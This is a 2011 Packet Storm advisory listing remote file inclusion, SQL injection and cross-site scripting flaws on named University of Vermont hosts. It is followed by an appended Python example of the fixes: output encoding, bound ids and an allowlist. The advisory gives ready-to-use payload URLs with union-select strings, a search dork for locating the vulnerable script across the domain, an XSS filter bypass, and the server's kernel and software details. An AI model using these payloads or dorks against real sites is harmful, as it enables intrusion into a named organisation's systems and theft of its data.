University Of Vermont XSS / RFI / SQL Injection

2011-08-10T00:00:00
ID PACKETSTORM:104018
Type packetstorm
Reporter Codeine
Modified 2011-08-10T00:00:00

Description

                                        
##############################################################################################  
| Title : University Of Vermont Multiple Vulnerabilities(uvm.edu)  
| Author : Codeine  
| Email : f3codeine[at]yahoo[dot]com  
| Twitter: codeinesec  
| Date : 08/10/2011  
| Cat : PHP[RFI,SQLI,XSS]  
| URL : http://uvm.edu/  
##############################################################################################  
Uname: Linux tarantula.uvm.edu 2.6.23.17-3.uvm #1 SMP Tue Dec 15 12:08:51 EST 2009 i686  
Software: Apache/2.2.3 (Red Hat). PHP/5.3.3   
##############################################################################################  
  
The University Of Vermont suffers from multiple web application vulnerabilities such as  
Remote File Inclusion, SQL Injection and Cross-Site Scripting (XSS).  
  
##############################################################################################  
[*]Remote File Inclusion-  
magicscript.php?Page=Calendar&intro=http://google.com/  
This script shows up in almost every directory of every subdomain of uvm.edu.  
http://vermontdesigninstitute.org/extension/magicscript.php?Page=Calendar&intro=http://google.com/  
http://www.uvm.edu/magicscript.php?Page=Calendar&intro=http://google.com/  
Dork: site:uvm.edu inurl:magicscript  
_________________________________________________________________________________________________  
[*]SQL Injection-  
http://vmc.snr.uvm.edu/vmc/research/metadata.php?id=-25%20union%20select%20@@version,2,3--  
[*]XSS-  
http://vmc.snr.uvm.edu/vmc/research/searchresults.php (Post)  
Magic quotes are active, but easily bypassable with "String.fromCharCode"  
<script>alert(String.fromCharCode(67, 111, 100, 101, 105, 110, 101, 88, 115, 115))</script>  
The above is what I sent to post, which contains "CodeineXss"  
_________________________________________________________________________________________________   
[*]SQL Injection-  
http://www.uvm.edu/rsenr/nsrc/projectpages/project.php?id=-69%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89--  
_________________________________________________________________________________________________  
[*]SQL Injection-  
http://bol.uvm.edu/tool_feature.php?id=-1%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--  
_________________________________________________________________________________________________  
Greetz Hidden Ninja  
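Added example, not part of the original advisory and not the site's code: a Python model of why quote escaping leaves the posted string untouched, next to the fix for each of the three parameter classes above (output encoding, bound integer ids, an allowlisted include name). The magic_quotes() model, the metadata table and the INTRO_PAGES allowlist are assumptions made for illustration.

```python
import html
import sqlite3

# Constructed inputs: the decoded parameter values shown in the advisory.
XSS_POST = "<script>alert(String.fromCharCode(67, 111, 100, 101, 105, 110, 101, 88, 115, 115))</script>"
SQLI_ID = "-25 union select @@version,2,3--"
RFI_INTRO = "http://google.com/"

def magic_quotes(value: str) -> str:
    """Model of PHP addslashes(): escapes only ', ", backslash and NUL."""
    table = {"'": "\\'", '"': '\\"', "\\": "\\\\", "\x00": "\\0"}
    return "".join(table.get(ch, ch) for ch in value)

def render_term(term: str) -> str:
    """Output encoding for an HTML body or quoted attribute value."""
    return html.escape(term, quote=True)

def lookup_title(db: sqlite3.Connection, raw_id: str):
    """Validate the id as a short decimal integer, then bind it as data."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return None  # reject anything that is not a plain number
    row = db.execute("SELECT title FROM metadata WHERE id = ?",
                     (int(raw_id),)).fetchone()
    return row[0] if row else None

# Hypothetical allowlist: page names map to fixed local files, never to URLs.
INTRO_PAGES = {"calendar": "intro/calendar.html", "news": "intro/news.html"}

def resolve_intro(name: str):
    """Return a local path for a known page name, or None for anything else."""
    return INTRO_PAGES.get(name.lower())

def demo_db() -> sqlite3.Connection:
    """In-memory table with one constructed record."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE metadata (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO metadata VALUES (25, 'Constructed sample record')")
    return db

if __name__ == "__main__":
    # The posted string has no quote characters, so quote escaping is a no-op.
    print("unchanged by magic quotes:", magic_quotes(XSS_POST) == XSS_POST)
    print("encoded for output:", render_term(XSS_POST))
    print("id lookups:", lookup_title(demo_db(), "25"), lookup_title(demo_db(), SQLI_ID))
    print("intro:", resolve_intro("Calendar"), resolve_intro(RFI_INTRO))
```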